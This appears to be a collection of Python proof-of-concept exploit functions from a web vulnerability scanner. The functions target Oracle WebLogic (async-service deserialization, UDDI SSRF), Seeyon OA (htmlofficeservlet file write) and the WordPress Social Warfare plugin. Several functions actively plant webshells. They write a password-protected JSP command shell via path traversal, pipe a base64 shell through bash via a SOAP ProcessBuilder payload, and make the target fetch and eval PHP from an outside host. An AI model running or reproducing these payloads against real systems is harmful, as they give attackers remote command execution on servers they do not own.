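def poc(url):
    """Check a WebLogic host for the async-service endpoint and try the platform-specific shell drops.

    Args:
        url: Target host or URL. A scheme is prepended when missing; any path,
            query or fragment is discarded so only scheme://host[:port] is used.

    Returns:
        A list of webshell URLs collected by the Linux/Windows check helpers, or an
        empty list when ``/_async/AsyncResponseService`` is unreachable or does not
        answer 200.
    """
    # Normalise to scheme://host[:port]. startswith() rather than url[:4] so that a
    # bare hostname that happens to begin with "http" (e.g. httpbin.org) still gets
    # a scheme instead of being parsed as a scheme-less path.
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    parsed = urlparse(url)
    url = parsed.scheme + "://" + parsed.netloc

    # Cheap pre-check: the async endpoint has to be there before any payload is worth sending.
    attack_url = url + '/_async/AsyncResponseService'
    try:
        # verify=False is deliberate for a scanner: targets commonly use self-signed certs.
        r = request.get(url=attack_url,
                        headers=get_headers,
                        timeout=4,
                        verify=False)
    except Exception:
        # `except Exception`, not a bare except, so Ctrl-C still aborts a long scan.
        return []
    if r.status_code != 200:
        return []

    # The target OS is unknown, so both the Linux and the Windows variants are run;
    # each helper appends the URL of any shell it manages to create.
    webshell_path = []
    linux_check_1(url, webshell_path)
    linux_check_2(url, webshell_path)
    windows_check_1(url, webshell_path)
    windows_check_2(url, webshell_path)

    return webshell_path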
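def poc(url):
    """Probe a Seeyon OA host for the htmlofficeservlet file write and plant a JSP shell.

    Args:
        url: Target host or URL. A scheme is prepended when missing; any path or
            query is discarded so only scheme://host[:port] is used.

    Returns:
        The shell URL (with a ``whoami`` query string) when a shell is already
        present or was written and answers with its ``:-)`` marker; otherwise False.
    """
    # startswith() rather than url[:4] so a bare hostname beginning with "http"
    # (e.g. httpbin.org) still gets a scheme instead of being parsed as a path.
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
        }

    # shell_name can be changed; the probe URL below is derived from it.
    shell_name="config_db1.jsp"

    shell_url = url + "/seeyon/" + shell_name

    # If a shell from an earlier run is already there, reuse it rather than uploading again.
    try:
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except Exception:
        # Best-effort probe: a failure here just means we fall through to the upload.
        pass

    # Traverse out of the servlet's write location into the seeyon webapp root.
    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell content can be changed; length and md5 below are computed from it.
    # NOTE(review): the shell password is a static string shared by every copy of this
    # PoC, so anyone who knows it can drive the shell too - remove it after testing.
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    # Opaque base64-encoded request template (redacted in this copy). The '355', '666'
    # and long-token placeholders inside it are patched with the real header length,
    # shell length and encoded file name below - the numbers must stay consistent.
    base_header = "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"

    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
                                    payload_shell_name), 'utf-8') + payload_shell
    try:
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except Exception:
        # `except Exception`, not a bare except, so Ctrl-C still aborts a long scan.
        return False

    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False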
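def poc(url):
    """Check a WebLogic host for SSRF through the UDDI explorer's SearchPublicRegistries.jsp.

    The ``operator`` parameter is pointed at ``http://localhost/robots.txt``; the
    response text then distinguishes a connection that was made (SOAP parse error)
    from one that failed (``IO Exception on sendMessage``).

    Args:
        url: Target host or URL. A scheme is prepended when missing; any path or
            query is discarded so the probe path is appended to scheme://host[:port]
            (matches the other checks in this file and avoids a double slash).

    Returns:
        True when the XML_SoapException marker is present without the IO-exception
        marker, otherwise False (including on any request error).
    """
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    parsed = urlparse(url)
    url = parsed.scheme + "://" + parsed.netloc

    headers = {
        "User-Agent":
        "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
    vulnurl = url + payload
    try:
        # verify=False as in the sibling checks: an https target with a self-signed
        # cert would otherwise raise and be reported as "not vulnerable".
        req = request.get(vulnurl, headers=headers, timeout=10, verify=False)
    except Exception:
        # `except Exception`, not a bare except, so Ctrl-C still aborts a long scan.
        return False

    body = req.text
    return (r"weblogic.uddi.client.structures.exception.XML_SoapException" in body
            and r"IO Exception on sendMessage" not in body)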
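def poc(url):
    """Report whether the module-level ``payload`` path answers 200 on the target.

    Relies on two module globals: ``payload`` (path plus query appended to the
    host) and ``headers`` (request headers).

    Args:
        url: Target host or URL. A scheme is prepended when missing; any path or
            query is discarded so ``payload`` is appended to scheme://host[:port].

    Returns:
        The full probe URL on a 200 response, False on any other status or on a
        request error. Redirects are not followed, so a 30x counts as False.
        NOTE(review): a 200 alone is a weak signal on hosts that serve a catch-all
        page; callers may want to inspect the body as well.
    """
    # startswith() rather than url[:4] so a bare hostname beginning with "http"
    # (e.g. httpbin.org) still gets a scheme instead of being parsed as a path.
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    parsed = urlparse(url)
    url = parsed.scheme + "://" + parsed.netloc + payload
    try:
        req = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False)
    except Exception:
        # `except Exception`, not a bare except, so Ctrl-C still aborts a long scan.
        return False
    return url if req.status_code == 200 else False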
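def bak_scan(url, payloads, result):
    """Drain ``payloads`` and append every path that looks like an exposed backup or VCS leak to ``result``.

    Args:
        url: Base URL; each payload is appended after a single "/".
        payloads: Queue of relative paths to probe (a ``queue.Queue``-style object
            with ``get_nowait``). It is consumed until empty.
        result: List that matching full URLs are appended to.

    Archive-like names (substring zip/rar/gz/sql) are probed with HEAD so a large
    file is never downloaded; only the Content-Type is inspected, which still
    yields some false positives (e.g. a 404 page served as
    application/octet-stream). svn/git/hg/web.xml probes need the body, so they
    use GET and look for a marker string. A failure on one path skips that path.
    """
    from queue import Empty

    headers = {"User-Agent": get_random_ua()}
    archive_markers = ('zip', 'rar', 'gz', 'sql')

    while True:
        # get_nowait() instead of empty()+get(): with several workers sharing the
        # queue, another worker can drain it between the two calls and a plain
        # get() would then block forever.
        try:
            payload = payloads.get_nowait()
        except Empty:
            break

        vulnurl = url + "/" + payload
        try:
            found = False
            if any(marker in payload for marker in archive_markers):
                req = request.head(vulnurl,
                                   headers=headers,
                                   timeout=5,
                                   allow_redirects=False,
                                   verify=False)
                # Observed types: 404 page 'application/octet-stream';
                # zip 'application/x-zip-compressed' / 'application/zip';
                # rar 'application/octet-stream' / 'application/x-rar-compressed'.
                if req.status_code == 200:
                    # .get() so a 200 with no Content-Type header is not silently
                    # dropped by a KeyError landing in the except below.
                    ctype = req.headers.get('Content-Type', '')
                    found = 'html' not in ctype and 'image' not in ctype
            else:
                req = request.get(vulnurl,
                                  headers=headers,
                                  timeout=5,
                                  verify=False,
                                  allow_redirects=False)
                if req.status_code == 200:
                    body = req.text
                    if 'svn' in payload:
                        found = 'dir' in body and 'svn' in body
                    elif 'git' in payload:
                        found = 'repository' in body
                    elif 'hg' in payload:
                        found = 'hg' in body
                    elif '/WEB-INF/web.xml' in payload:
                        found = 'web-app' in body
            if found:
                result.append(vulnurl)
        except Exception:
            # Per-path best effort: a timeout or connection error on one payload
            # must not stop the rest of the queue from being scanned.
            continue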
def linux_check_2(url, webshell_path):
    """Second Linux variant of the WebLogic async-service check.

    Posts a SOAP envelope whose WorkContext header builds a ProcessBuilder that
    pipes a base64 blob through ``base64 -d`` into ``webshell2.jsp`` under the
    bea_wls_internal webapp, waits a second, then fetches that JSP. On a 200 the
    shell's command URL is appended to ``webshell_path``. Every error is swallowed:
    this is one of several best-effort variants the caller runs in turn.

    Args:
        url: Normalised scheme://host[:port] of the target.
        webshell_path: List that the shell URL is appended to on success.
    """
    soap_envelope = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
        <soapenv:Header> 
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>"""

    try:
        endpoint = url + '/_async/AsyncResponseService'
        request.post(url=endpoint,
                     data=soap_envelope,
                     headers=post_headers,
                     timeout=5,
                     verify=False)
        shell_url = url + '/bea_wls_internal/webshell2.jsp'
        # Give the server a moment to write the file before probing for it.
        time.sleep(1)
        probe = request.get(url=shell_url,
                            headers=get_headers,
                            timeout=5,
                            verify=False)
        # Only the status is checked; the JSP body is not inspected.
        if probe.status_code == 200:
            webshell_path.append("{}?pwd=123&cmd=whoami".format(shell_url))
    except Exception:
        # Failure just means this variant did not work; the caller tries the others.
        pass
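def poc(url):
    """Check that the target's admin login page is reachable, then run the fast check.

    Args:
        url: Target host or URL. A scheme is prepended when missing; any path or
            query is discarded so only scheme://host[:port] is used.

    Returns:
        The list filled in by ``fast_check_1``, or an empty list when
        ``/admin/index/login.html`` is unreachable or does not answer 200.
    """
    # startswith() rather than url[:4] so a bare hostname beginning with "http"
    # (e.g. httpbin.org) still gets a scheme instead of being parsed as a path.
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    parsed = urlparse(url)
    url = parsed.scheme + "://" + parsed.netloc

    # Pre-check: the login page must exist before the real check is attempted.
    attack_url = url + '/admin/index/login.html'
    try:
        r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False)
    except Exception:
        # `except Exception`, not a bare except, so Ctrl-C still aborts a long scan.
        return []
    if r.status_code != 200:
        return []

    attach_path = []
    fast_check_1(url, attach_path)
    return attach_path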
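def poc(url):
    """Check a WordPress host for the Social Warfare ``swp_debug=load_options`` remote include.

    Args:
        url: Target host or URL. A scheme is prepended when missing; any path or
            query is discarded so only scheme://host[:port] is used.

    Returns:
        A dict with ``payload`` (the probe URL), ``post_data`` (empty) and ``info``
        when the response is 200 and contains "PHP Version"; otherwise False.
    """
    # startswith() rather than url[:4] so a bare hostname beginning with "http"
    # (e.g. httpbin.org) still gets a scheme instead of being parsed as a path.
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    parsed = urlparse(url)
    url = parsed.scheme + "://" + parsed.netloc

    # Remote file the plugin is made to fetch; its content is <pre>eval($_REQUEST['z']);</pre>.
    # NOTE(review): this host is not under the operator's control - whatever it serves
    # is executed on the target, so host the stub yourself before using this in anger.
    shellpath = "http://saucer-man.com/aa.txt"
    ## TODO: consolidate with the other checks that need this kind of hosted helper.
    # PHP executed through the eval stub; phpinfo() gives an easy-to-detect marker.
    shell = "phpinfo();"

    vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
        shellpath=shellpath, shell=shell)
    try:
        headers = {"User-Agent": get_random_ua()}
        r = request.get(vulnurl,
                        headers=headers,
                        timeout=5,
                        verify=False,
                        allow_redirects=False)
    except Exception:
        # `except Exception`, not a bare except, so Ctrl-C still aborts a long scan.
        return False

    if r.status_code == 200 and "PHP Version" in r.text:
        return {
            'payload':
            vulnurl,
            'post_data':
            '',
            'info':
            'wordpress plugin Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)'
        }
    return False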